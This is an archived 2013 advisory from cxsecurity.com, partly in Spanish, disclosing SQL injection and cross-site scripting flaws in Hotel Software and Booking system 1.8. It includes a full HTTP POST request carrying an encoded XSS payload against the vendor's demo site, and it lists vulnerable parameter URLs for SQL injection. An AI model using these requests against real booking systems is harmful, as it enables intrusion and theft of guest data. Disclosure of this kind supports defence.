Hotel Software and Booking system 1.8 SQL Injection & Cross Site Scripting

2013.08.22
Credit: Dylan Irzi
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79

########################################################################################### # Exploit Title: Hotel Software and Booking system 1.8 - SQL Injection / Cross Site Scripting # Date: 21 de Agosto del 2013 # Exploit Author: Dylan Irzi # Credit goes for: websecuritydev.com # Vendor Homepage: http://www.cbhotel.eu/ # Tested on: Win8 & Linux Mint # Affected Version : 1.8 & Anteriores. # Contacts: { https://twitter.com/Dylan_irzi11 , http://websecuritydev.com/} # Greetz: All team WebSecuritydev, SeguridadBlanca (Dedalo) ########################################################################################### *Cross Site Scripting:* Archivos Afectados Afectados http://localhost/cbadm/reservations/index.php?ac=search ------------------------------------------------------------------- PoC: *Cross Site Scripting Post.* URL: http://demo.cbhotel.eu/cbadm/reservations/index.php?ac=search Host: demo.cbhotel.eu User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0 AlexaToolbar/alxf-2.18 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://demo.cbhotel.eu/cbadm/adm_main.php Cookie: PHPSESSID=flp86mf2huj240qp6hj34ojgp3 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 87 ------------------------------------------------------------------- s=%22%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%2FXSS%2F%29%3B%3E%3E&button2=search&ss=ok ------------------------------------------------------------------- *SQL Injection* http://localhost/cbadm/clients/edit_client.php?id=1(SQL Injection) Example: http://demo.cbhotel.eu/cbadm/clients/edit_client.php?id=1 http://localhost/cbadm/reservations/editresx.php?ac=chrooms&id=OP5OC8Q&tip=DBL&room=344(SQLInjection) Example: http://demo.cbhotel.eu/cbadm/reservations/editresx.php?ac=chrooms&id=OP5OC8Q&tip=DBL&room=343(SQLInjection) ------------------------------------------------------------------- Example: http://www.cbhotel.eu/demo.php -------------------------------------------------------------------- *By Dylan Irzi @Dylan_Irzi11 Pentest de Seguridad. WhiteHat. *

References:

http://www.cbhotel.eu/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top